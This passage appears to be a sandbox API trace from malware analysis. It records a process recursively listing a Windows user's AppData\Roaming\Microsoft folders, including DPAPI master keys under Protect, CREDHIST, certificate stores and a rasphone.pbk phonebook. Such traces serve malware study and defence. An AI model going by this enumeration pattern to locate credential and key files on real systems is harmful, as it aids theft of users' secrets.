pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", pszFile="ImplicitAppShortcuts" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts" [0057.533] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*" [0057.533] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\ImplicitAppShortcuts\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb072d8 [0057.533] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.533] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0057.533] FindClose (in: hFindFile=0xb072d8 | out: hFindFile=0xb072d8) returned 1 [0057.534] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.534] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned", pszFile="TaskBar" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar" [0057.534] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*" [0057.534] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\Quick Launch\\User Pinned\\TaskBar\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb07158 [0057.534] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.534] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.534] PathMatchSpecW (pszFile="desktop.ini", pszSpec="*") returned 1 [0057.534] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.534] PathMatchSpecW (pszFile="File Explorer.lnk", pszSpec="*") returned 1 [0057.534] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0057.534] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0057.534] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0057.534] FindClose (in: hFindFile=0xb070d8 | out: hFindFile=0xb070d8) returned 1 [0057.535] FindNextFileW (in: hFindFile=0xb07458, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.535] PathMatchSpecW (pszFile="Window Switcher.lnk", pszSpec="*") returned 1 [0057.535] FindNextFileW (in: hFindFile=0xb07458, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.535] FindClose (in: hFindFile=0xb07458 | out: hFindFile=0xb07458) returned 1 [0057.535] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.535] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer", pszFile="UserData" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData" [0057.535] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*" [0057.535] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb07358 [0057.535] FindNextFileW (in: hFindFile=0xb07358, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.535] FindNextFileW (in: hFindFile=0xb07358, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.535] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData", pszFile="Low" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low" [0057.536] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*" [0057.536] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Internet Explorer\\UserData\\Low\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb072d8 [0057.536] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.536] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0057.536] FindClose (in: hFindFile=0xb072d8 | out: hFindFile=0xb072d8) returned 1 [0057.536] FindNextFileW (in: hFindFile=0xb07358, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.536] FindClose (in: hFindFile=0xb07358 | out: hFindFile=0xb07358) returned 1 [0057.536] FindNextFileW (in: hFindFile=0xb07558, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0057.536] FindClose (in: hFindFile=0xb07558 | out: hFindFile=0xb07558) returned 1 [0057.537] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.537] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="MMC" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\MMC") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\MMC" [0057.537] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\MMC", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\MMC\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\MMC\\*" [0057.537] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\MMC\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb07158 [0057.537] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.537] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0057.537] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0057.537] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.537] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="Network" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network" [0057.537] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\*" [0057.537] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb070d8 [0057.538] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.538] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.538] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network", pszFile="Connections" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections" [0057.538] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*" [0057.538] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb07158 [0057.538] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.538] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.538] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections", pszFile="Pbk" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk" [0057.538] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*" [0057.538] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb071d8 [0057.539] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.539] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.539] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk", pszFile="_hiddenPbk" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk" [0057.539] PathCombineW (in: pszDest=0x9ace20, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*" [0057.539] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Network\\Connections\\Pbk\\_hiddenPbk\\*", lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0xb07218 [0057.539] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.539] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 1 [0057.539] PathMatchSpecW (pszFile="rasphone.pbk", pszSpec="*") returned 1 [0057.539] FindNextFileW (in: hFindFile=0xb07218, lpFindFileData=0x9acbd0 | out: lpFindFileData=0x9acbd0) returned 0 [0057.539] FindClose (in: hFindFile=0xb07218 | out: hFindFile=0xb07218) returned 1 [0057.539] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0057.539] FindClose (in: hFindFile=0xb071d8 | out: hFindFile=0xb071d8) returned 1 [0057.540] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.540] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0057.540] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0057.540] FindClose (in: hFindFile=0xb070d8 | out: hFindFile=0xb070d8) returned 1 [0057.540] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.541] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="Protect" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect" [0057.541] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\*" [0057.541] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb072d8 [0057.541] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.541] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.541] PathMatchSpecW (pszFile="CREDHIST", pszSpec="*") returned 1 [0057.541] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.541] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect", pszFile="S-1-5-21-3582695476-958571460-1978946630-1000" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3582695476-958571460-1978946630-1000") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3582695476-958571460-1978946630-1000" [0057.541] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3582695476-958571460-1978946630-1000", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3582695476-958571460-1978946630-1000\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3582695476-958571460-1978946630-1000\\*" [0057.541] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\Protect\\S-1-5-21-3582695476-958571460-1978946630-1000\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb070d8 [0057.541] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.541] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.542] PathMatchSpecW (pszFile="0e76ac85-01bf-412c-91a2-cef2eedde61a", pszSpec="*") returned 1 [0057.542] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.542] PathMatchSpecW (pszFile="1c8a6982-c4e6-4629-889a-0618a9675336", pszSpec="*") returned 1 [0057.542] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.542] PathMatchSpecW (pszFile="1cb7f609-08bd-4986-8a90-4f6e24f5d8cc", pszSpec="*") returned 1 [0057.542] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.542] PathMatchSpecW (pszFile="491bb34f-16c1-4bee-9f8c-432483187207", pszSpec="*") returned 1 [0057.542] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.542] PathMatchSpecW (pszFile="Preferred", pszSpec="*") returned 1 [0057.542] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.542] FindClose (in: hFindFile=0xb070d8 | out: hFindFile=0xb070d8) returned 1 [0057.542] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.542] PathMatchSpecW (pszFile="SYNCHIST", pszSpec="*") returned 1 [0057.542] FindNextFileW (in: hFindFile=0xb072d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0 [0057.542] FindClose (in: hFindFile=0xb072d8 | out: hFindFile=0xb072d8) returned 1 [0057.542] FindNextFileW (in: hFindFile=0xb07418, lpFindFileData=0x9addf0 | out: lpFindFileData=0x9addf0) returned 1 [0057.542] PathCombineW (in: pszDest=0x9ae040, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft", pszFile="SystemCertificates" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates" [0057.543] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*" [0057.543] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\*", lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 0xb070d8 [0057.543] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.543] FindNextFileW (in: hFindFile=0xb070d8, lpFindFileData=0x9ad968 | out: lpFindFileData=0x9ad968) returned 1 [0057.543] PathCombineW (in: pszDest=0x9adbb8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates", pszFile="My" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My" [0057.543] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*" [0057.543] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\*", lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0xb071d8 [0057.543] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.543] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.543] PathMatchSpecW (pszFile="AppContainerUserCertRead", pszSpec="*") returned 1 [0057.543] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.543] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="Certificates" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates" [0057.544] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*" [0057.544] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\Certificates\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb07158 [0057.544] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.544] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0057.544] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0057.544] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.544] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="CRLs" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs" [0057.544] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*" [0057.544] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CRLs\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb07158 [0057.544] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.545] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0057.545] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0057.545] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 1 [0057.545] PathCombineW (in: pszDest=0x9ad730, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My", pszFile="CTLs" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs" [0057.545] PathCombineW (in: pszDest=0x9ad2a8, pszDir="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs", pszFile="*" | out: pszDest="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*") returned="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*" [0057.545] FindFirstFileW (in: lpFileName="C:\\Users\\WI2yhmtI onvScY7Pe\\AppData\\Roaming\\Microsoft\\SystemCertificates\\My\\CTLs\\*", lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0xb07158 [0057.545] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 1 [0057.545] FindNextFileW (in: hFindFile=0xb07158, lpFindFileData=0x9ad058 | out: lpFindFileData=0x9ad058) returned 0 [0057.545] FindClose (in: hFindFile=0xb07158 | out: hFindFile=0xb07158) returned 1 [0057.545] FindNextFileW (in: hFindFile=0xb071d8, lpFindFileData=0x9ad4e0 | out: lpFindFileData=0x9ad4e0) returned 0 [0057.545] FindClose 